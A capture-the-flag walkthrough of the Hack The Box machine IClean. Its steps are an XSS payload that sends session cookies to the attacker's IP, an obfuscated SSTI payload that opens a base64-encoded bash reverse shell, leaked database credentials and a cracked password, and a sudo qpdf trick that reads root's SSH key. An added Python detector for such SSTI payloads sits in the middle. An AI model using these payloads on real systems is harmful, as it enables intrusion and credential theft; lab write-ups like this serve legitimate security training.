IClean HTB
by kpax
Initial Access

The quote page is susceptible to XSS.
Adding this to the service parameter will capture a session cookie:
<img src=x onerror=this.src="http://10.10.14.2:8000/?c="+document.cookie>

session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.Zpu0Og.SVSBwcg-U7uq-36NT71QSYGBLw8
SSTI
When generating a QR code for the invoice, the qr_link field is susceptible to an SSTI.

We can use the following POST data to get a reverse shell:
invoice_id=&form_type=scannable_invoice&qr_link={{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMi85MDAxICAwPiYx | base64 -d | bash')|attr('read')()}}
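An added detection check, not part of the original write-up: the payload above hides the dunder names behind \x5f escapes, so a filter that matches a literal "__" in the form body misses it. This decodes URL encoding and \xHH escapes before looking for Jinja expressions; the sample bodies and field names are constructed for the test.

```python
import re
from urllib.parse import unquote_plus

# Constructed request bodies shaped like the qr_link payload above; these are
# detector test inputs, not captured traffic from the box.
SAMPLES = {
    "benign": "invoice_id=42&form_type=scannable_invoice&qr_link=https://shop.example/42",
    "plain_dunder": "qr_link={{request.application.__globals__}}",
    "hex_escaped": "qr_link={{request|attr('application')|attr('\\x5f\\x5fglobals\\x5f\\x5f')}}",
    "url_encoded": "qr_link=%7B%7Brequest%7Cattr%28%27application%27%29%7D%7D",
}

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")           # \x5f -> "_"
TEMPLATE_EXPR = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)  # Jinja delimiters
DUNDER_OR_ATTR = re.compile(r"__\w+__|\battr\s*\(")        # __globals__, |attr(

def normalize(body: str) -> str:
    """Strip the encoding layers before matching: URL encoding, then the
    \\xHH string escapes Jinja resolves inside quoted literals. Matching on a
    literal "__" alone misses the hex-escaped form used in the payload above."""
    text = body
    for _ in range(3):                      # bounded rounds cover double encoding
        decoded = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), unquote_plus(text))
        if decoded == text:
            break
        text = decoded
    return text

def ssti_findings(body: str) -> list[str]:
    """Return the indicators found in one form body (empty list means clean)."""
    findings = []
    for expr in TEMPLATE_EXPR.findall(normalize(body)):
        findings.append("template expression in form field")
        if DUNDER_OR_ATTR.search(expr):
            findings.append("dunder or attr() access inside expression")
        break                               # one expression is enough to flag
    return findings

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:13} -> {ssti_findings(body) or ['clean']}")
```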
Shell as www-data
app.py contains database credentials:
db_config = {
'host': '127.0.0.1',
'user': 'iclean',
'password': 'pxCsmnGLckUb',
'database': 'capiclean'
}
The users table in the database holds a hash for consuela, which CrackStation resolves to:
consuela:simple and clean
SSH shell as Consuela
Consuela can run qpdf as root using sudo.

We can use qpdf to attach files to a PDF and then read them on our own machine:
sudo /usr/bin/qpdf --empty --add-attachment /root/.ssh/id_rsa -- out.pdf
